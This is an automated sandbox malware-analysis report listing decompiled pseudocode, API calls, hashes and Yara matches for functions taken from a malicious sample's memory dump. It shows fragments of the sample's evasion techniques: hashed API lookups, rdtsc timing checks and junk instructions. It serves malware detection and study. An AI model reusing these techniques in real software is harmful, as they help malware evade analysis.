                                                                          Download Yara Rule
                                                                          C-Code - Quality: 40%
                                                                          			E004186FB(void* __eax, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v0;
				long _t11;
				void* _t16;

				_push(__edi);
				asm("into");
				_t16 = __esi + 1;
				 *(__eax - 0x741374ab) =  !( *(__eax - 0x741374ab));
				_t8 = _v0;
				_t4 = _t8 + 0x10; // 0x300
				_push(_t16);
				_t5 = _t8 + 0xc50; // 0x409773
				E004191D0(__edi, _v0, _t5,  *_t4, 0, 0x2c);
				asm("adc al, 0x52"); // executed
				_t11 = NtClose(??); // executed
				return _t11;
			}






                                                                          0x004186fb
                                                                          0x004186fc
                                                                          0x004186fd
                                                                          0x004186fe
                                                                          0x00418703
                                                                          0x00418706
                                                                          0x00418709
                                                                          0x0041870f
                                                                          0x00418717
                                                                          0x00418723
                                                                          0x00418725
                                                                          0x00418729

                                                                          APIs
                                                                          • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 970ffaebdd0900170551bb72a539d9bf047e582836a880ab19da45464d6a4157
                                                                          • Instruction ID: 91f7fb2e6f1f8d8a2516701943f21fb745bab37a8feea930ebc1e9e8948abf7e
                                                                          • Opcode Fuzzy Hash: 970ffaebdd0900170551bb72a539d9bf047e582836a880ab19da45464d6a4157
                                                                          • Instruction Fuzzy Hash: F7D02BA940D2C04FD711FB7468C50C27F80DE5211871859CED8E407503C5649615D391
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				asm("adc al, 0x52"); // executed
				_t8 = NtClose(??); // executed
				return _t8;
			}





                                                                          0x00418703
                                                                          0x00418706
                                                                          0x0041870f
                                                                          0x00418717
                                                                          0x00418723
                                                                          0x00418725
                                                                          0x00418729

                                                                          APIs
                                                                          • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041872A, Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 3f38efd70032b30d505f00149dc41530f180062db7a116f8897dbaffbbde2f7a
                                                                          • Instruction ID: 36509fb2245b39fe827852af0e70488ca9032034e1bba789ba6be93774e29623
                                                                          • Opcode Fuzzy Hash: 3f38efd70032b30d505f00149dc41530f180062db7a116f8897dbaffbbde2f7a
                                                                          • Instruction Fuzzy Hash: E8A0023F24A429245A6162F97C85CD9971DD5CABBA324406FF52CD08A18C4F069116A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b44c526901bb04a44caddd3e947e84956c26aca86ba534ad875e1608fc94235b
                                                                          • Instruction ID: f719fea359b08bc7f6f8e0580ebf3a35480de2bbbcc3bc05db554ac5fc223aae
                                                                          • Opcode Fuzzy Hash: b44c526901bb04a44caddd3e947e84956c26aca86ba534ad875e1608fc94235b
                                                                          • Instruction Fuzzy Hash: A49002B120100402D644719955047460005A7E0741F51C029A5055594EC7998DD5B6E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a70a6c609e1575ac3ad40bc879be867d805962678b4e36af32dd14f663bef73c
                                                                          • Instruction ID: f46c4689acc79f291c5185e09ba1a290ce110bc168485ead89a9055b748e4d75
                                                                          • Opcode Fuzzy Hash: a70a6c609e1575ac3ad40bc879be867d805962678b4e36af32dd14f663bef73c
                                                                          • Instruction Fuzzy Hash: 79900275211000030609A59917045070046A7E5791351C039F1006590CD7618861A1A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a9c12a8658e19bb99bb41593e1fd03347bac3322dfc6525f92664b0bbad63897
                                                                          • Instruction ID: 7c509a14ded993e5493bcce0d73c9294e414c457d7431f122b74dfc98d2d12c2
                                                                          • Opcode Fuzzy Hash: a9c12a8658e19bb99bb41593e1fd03347bac3322dfc6525f92664b0bbad63897
                                                                          • Instruction Fuzzy Hash: C09002B134100442D60461995514B060005E7F1741F51C02DE1055594DC759CC52B1AA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 62fcced307ecf400eb35f646fc847a9bfdbd86e4b6ed2987c8c3a89cef6534ee
                                                                          • Instruction ID: 15a6a7911be5a40ad43d459fd473f9bd204a6c66a2db7f22df1705d2198106eb
                                                                          • Opcode Fuzzy Hash: 62fcced307ecf400eb35f646fc847a9bfdbd86e4b6ed2987c8c3a89cef6534ee
                                                                          • Instruction Fuzzy Hash: B19002B120200003460971995514616400AA7F0641B51C039E10055D0DC6658891B1A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b78a2ddacaec3624ebe701a5ec36f334d87cffb21635dc859e30374c2c8e4974
                                                                          • Instruction ID: dd2f843aea7633beb2fba9fd0ec7276acd561a87454100ba0da7d76b150b237d
                                                                          • Opcode Fuzzy Hash: b78a2ddacaec3624ebe701a5ec36f334d87cffb21635dc859e30374c2c8e4974
                                                                          • Instruction Fuzzy Hash: 35900271242041525A49B19955045074006B7F0681791C02AA1405990CC6669856E6A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: cb9dd0238e4404e1a4363dbc2ccae0c28b64e614df29c9940a8844599cb74133
                                                                          • Instruction ID: b60d7562ddd72570eb815043d66788b9c5489df409441a10f20ccdfe239edfd0
                                                                          • Opcode Fuzzy Hash: cb9dd0238e4404e1a4363dbc2ccae0c28b64e614df29c9940a8844599cb74133
                                                                          • Instruction Fuzzy Hash: EA90027120100413D615619956047070009A7E0681F91C42AA0415598DD7968952F1A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 1d54446ed599f75f86edc6a8f908aebf10ba896614c2aa914b2771386de76f58
                                                                          • Instruction ID: 725f23793ba414146712d67c0dca034ede1f3085c8e8fb69abe611bcd3941bc4
                                                                          • Opcode Fuzzy Hash: 1d54446ed599f75f86edc6a8f908aebf10ba896614c2aa914b2771386de76f58
                                                                          • Instruction Fuzzy Hash: 1690027160100502D60571995504616000AA7E0681F91C03AA1015595ECB658992F1B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 767b5d5d90219e51edd5ecf3334b91f31ac961f393936f0b79ccba11af4a1d2b
                                                                          • Instruction ID: 2556c592609134f085786d2caf06bca8977d937f3462fb43dba117a20ca35035
                                                                          • Opcode Fuzzy Hash: 767b5d5d90219e51edd5ecf3334b91f31ac961f393936f0b79ccba11af4a1d2b
                                                                          • Instruction Fuzzy Hash: D190027120100402D60465D965086460005A7F0741F51D029A5015595EC7A58891B1B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 566d36524e3e5dfa8d9ebc937f9dd625e8e99660c9475db7d4649bebc27f6fa9
                                                                          • Instruction ID: 27e6ae9cce9b2a2172c5e5f2a93c8866bbcf0f82adf65ed2ca7214918a59e9d1
                                                                          • Opcode Fuzzy Hash: 566d36524e3e5dfa8d9ebc937f9dd625e8e99660c9475db7d4649bebc27f6fa9
                                                                          • Instruction Fuzzy Hash: F090027921300002D6847199650860A0005A7E1642F91D42DA0006598CCA558869A3A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 813aed11c4fca1424090f372ed2701c5f8500c3c2cccc57da3ff850f943948df
                                                                          • Instruction ID: d25deb3f1eee9f546142c1a55e81959f47b120d9aebea69aae5f2d7252934cf7
                                                                          • Opcode Fuzzy Hash: 813aed11c4fca1424090f372ed2701c5f8500c3c2cccc57da3ff850f943948df
                                                                          • Instruction Fuzzy Hash: 4090027130100003D644719965186064005F7F1741F51D029E0405594CDA558856A2A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2eee50efde2f76bbb7ed9d0eb26f42aa0a8db2c82f5fc9aefadf0552f2a0510a
                                                                          • Instruction ID: 9a76517e83988cf83e171353bb3eaeb3a7e5abc37db362245d3f11a8a6a6424b
                                                                          • Opcode Fuzzy Hash: 2eee50efde2f76bbb7ed9d0eb26f42aa0a8db2c82f5fc9aefadf0552f2a0510a
                                                                          • Instruction Fuzzy Hash: CA90027131114402D614619995047060005A7E1641F51C429A0815598DC7D58891B1A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2dc531e1895913290b23f7e0b98c5e2f469daa777020463eef7c962b378ad134
                                                                          • Instruction ID: 8ac5feb50c6fce28254297b1923f08fbf1ab22d04cc488cf0bfc3a1a7d401c3f
                                                                          • Opcode Fuzzy Hash: 2dc531e1895913290b23f7e0b98c5e2f469daa777020463eef7c962b378ad134
                                                                          • Instruction Fuzzy Hash: F290027120140402D6046199591470B0005A7E0742F51C029A1155595DC7658851B5F5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3a5585d15764699f14d2d80006f189d2c693a151bc09dc0088bff9ea5737cda4
                                                                          • Instruction ID: 06582377208f7d0ec3bdda52c22edde5312ad2ed8728826a510357e058776bf3
                                                                          • Opcode Fuzzy Hash: 3a5585d15764699f14d2d80006f189d2c693a151bc09dc0088bff9ea5737cda4
                                                                          • Instruction Fuzzy Hash: 2190027160100042464471A999449064005BBF1651751C139A0989590DC6998865A6E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3ec1fe310797c2f64294dfcd947be5f903122484245577cb84c74f0104b57866
                                                                          • Instruction ID: 74d9d6bc147a312d1d3a69abe9df3d96c35e72c1b2a07121b7b46fd70b6f5550
                                                                          • Opcode Fuzzy Hash: 3ec1fe310797c2f64294dfcd947be5f903122484245577cb84c74f0104b57866
                                                                          • Instruction Fuzzy Hash: C490027121180042D70465A95D14B070005A7E0743F51C12DA0145594CCA558861A5A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 86edddcbc29fc4e2c23f8684e7d02a783a99b31e49f70c129d5e8c00416257bd
                                                                          • Instruction ID: e158dc473ec5795af881c3da9bc76a22a59b4ece9355e62a803c8d8926b9c4c1
                                                                          • Opcode Fuzzy Hash: 86edddcbc29fc4e2c23f8684e7d02a783a99b31e49f70c129d5e8c00416257bd
                                                                          • Instruction Fuzzy Hash: 4190027120100802D6847199550464A0005A7E1741F91C02DA0016694DCB558A59B7E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 110993635139cb5a678378334798dc76dfe449cd96e9e5418f581ff9da644c87
                                                                          • Instruction ID: b4d4cb46e1a4a5a018df347cbe27b320664fe60d7d4cfd1f26a730d3db4c5384
                                                                          • Opcode Fuzzy Hash: 110993635139cb5a678378334798dc76dfe449cd96e9e5418f581ff9da644c87
                                                                          • Instruction Fuzzy Hash: 7290027120108802D6146199950474A0005A7E0741F55C429A4415698DC7D58891B1A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 88%
                                                                          			E004088E0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t25;
				void* _t32;
				void* _t34;
				intOrPtr _t35;
				void* _t38;
				signed int _t44;
				char* _t48;
				void* _t50;
				intOrPtr _t53;
				void* _t54;
				void* _t57;
				void* _t59;
				void* _t60;
				void* _t61;

				asm("in al, dx");
				_t53 = _a4;
				_t38 = 0; // executed
				_t25 = E00406E30(_t53,  &_v24); // executed
				_t59 = _t57 - 0x344 + 8;
				if(_t25 != 0) {
					E00407040( &_v24,  &_v840);
					_t60 = _t59 + 8;
					do {
						E0041A0E0( &_v284, 0x104);
						E0041A750( &_v284,  &_v804);
						_t61 = _t60 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t32 = E00413E00(E00413DA0(_t53, _t50),  &_v284);
							_t61 = _t61 + 0x10;
							if(_t32 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L9;
						}
						_t9 = _t53 + 0x14; // 0xffffe1a5
						 *(_t53 + 0x474) =  *(_t53 + 0x474) ^  *_t9;
						_t38 = 1;
						L9:
						_t48 =  &_v840;
						_t34 = E00407070( &_v24, _t48);
						_t60 = _t61 + 8;
					} while (_t34 != 0 && _t38 == 0);
					_t44 =  &_v24;
					_t35 = E004070F0(_t53, _t44); // executed
					if(_t38 == 0) {
						asm("rdtsc");
						_t44 = 0 + _t35;
						asm("rdtsc");
						_t35 = _t35 - _t44;
						_v8 = _t35;
						 *((intOrPtr*)(_t53 + 0x55c)) =  *((intOrPtr*)(_t53 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t53 + 0x31)) =  *((intOrPtr*)(_t53 + 0x31)) + _t38;
					_pop(_t54);
					 *(_t48 - 0x3f01ceba) =  *(_t48 - 0x3f01ceba) ^ _t44;
					 *((intOrPtr*)(_t54 + 0x32)) =  *((intOrPtr*)(_t54 + 0x32)) + _t35;
					return 1;
				} else {
					return _t25;
				}
			}






















                                                                          0x004088e2
                                                                          0x004088eb
                                                                          0x004088f3
                                                                          0x004088f5
                                                                          0x004088fa
                                                                          0x004088ff
                                                                          0x00408912
                                                                          0x00408917
                                                                          0x00408920
                                                                          0x0040892c
                                                                          0x0040893f
                                                                          0x00408944
                                                                          0x00408947
                                                                          0x00408950
                                                                          0x00408962
                                                                          0x00408967
                                                                          0x0040896c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040896e
                                                                          0x00408972
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00408974
                                                                          0x00000000
                                                                          0x00408972
                                                                          0x00408976
                                                                          0x00408979
                                                                          0x0040897f
                                                                          0x00408981
                                                                          0x00408981
                                                                          0x0040898c
                                                                          0x00408991
                                                                          0x00408994
                                                                          0x0040899c
                                                                          0x004089a1
                                                                          0x004089ac
                                                                          0x004089ae
                                                                          0x004089b2
                                                                          0x004089b4
                                                                          0x004089b6
                                                                          0x004089b8
                                                                          0x004089bb
                                                                          0x004089bb
                                                                          0x004089c2
                                                                          0x004089c3
                                                                          0x004089c4
                                                                          0x004089ca
                                                                          0x004089d7
                                                                          0x00408901
                                                                          0x00408906
                                                                          0x00408906

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                                          • Instruction ID: fecb9998d56daf9cfaa78a55d0f1ea928f7019af28acdd4276aec55bf8742b64
                                                                          • Opcode Fuzzy Hash: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                                          • Instruction Fuzzy Hash: 4C212BB2D4020857CB10E6649E42BFF736C9B50304F04017FE989A2181F639AB498BA7
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x004188b7
                                                                          0x004188c2
                                                                          0x004188cd
                                                                          0x004188d1

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID: F5A
                                                                          • API String ID: 1279760036-683449296
                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E00409B50(_a4 + 0x1c,  &_v68);
				 *_t12 =  *_t12 + _t12; // executed
				_t13 = E00413E60(_t24, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}











                                                                          0x0040729f
                                                                          0x004072a3
                                                                          0x004072ae
                                                                          0x004072ba
                                                                          0x004072be
                                                                          0x004072c1
                                                                          0x004072ce
                                                                          0x004072d3
                                                                          0x004072da
                                                                          0x004072dd
                                                                          0x004072ea
                                                                          0x004072ec
                                                                          0x004072ee
                                                                          0x0040730b
                                                                          0x0040730b
                                                                          0x00000000
                                                                          0x0040730d
                                                                          0x00407312

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                                                          • Instruction ID: a55241834724a4f9522fcddb18cdf12f322e24b5025e529ea1e7499cfe7347ca
                                                                          • Opcode Fuzzy Hash: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                                                          • Instruction Fuzzy Hash: 88018431A8022876E721BA959C03FFF776C5B00B55F14015AFF04BA1C2E6A8790586FA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418A31, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 13119d7e7e02d7f816afb8232c10277a9abdf6e8b6f001c90d1aa8aad9b06221
                                                                          • Instruction ID: 6ee31f8ab96a980dcd69446e2aad247dbe559a5df63ab2b11106702328b4a2e9
                                                                          • Opcode Fuzzy Hash: 13119d7e7e02d7f816afb8232c10277a9abdf6e8b6f001c90d1aa8aad9b06221
                                                                          • Instruction Fuzzy Hash: 3801FDB52042446FCB14EBA49C89DE33BACEF41390F14498EFC8917202CA38AD54C7B4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407263, Relevance: 1.5, APIs: 1, Instructions: 40threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 59%
                                                                          			E00407263(intOrPtr* __eax, void* __ebx, void* __edi, signed int __esi) {
				int _t10;
				void* _t13;
				void* _t17;
				long _t20;
				signed int _t23;
				int _t24;
				void* _t28;

				asm("out 0xe0, eax");
				_t23 = __esi ^  *(__eax + 0x4a);
				if(_t23 < 0) {
					 *__eax =  *__eax + __eax; // executed
					_t10 = E00413E60(_t23, __eax, 0, 0, 0xc4e7b6d6);
					_t24 = _t10;
					__eflags = _t24;
					if(_t24 != 0) {
						_push(__edi);
						_t20 =  *(_t28 + 0xc);
						_t10 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
						__eflags = _t10;
						if(__eflags == 0) {
							_t10 =  *_t24(_t20, 0x8003, _t28 + (E004092B0(__eflags, 1, 8) & 0x000000ff) - 0x40, _t10);
						}
					}
					return _t10;
				} else {
					 *((intOrPtr*)(__ebx + __edi - 0x4ddf)) = es;
					_push(_t23);
					_t13 = E00419B10(__eax, _t17, 0x11c6f95e);
